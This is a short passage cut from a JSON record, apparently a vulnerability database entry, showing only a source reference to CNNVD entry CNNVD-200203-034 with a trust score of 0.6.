"db": "CNNVD",
"id": "CNNVD-200203-034"
}
],
"trust": 0.6
}
}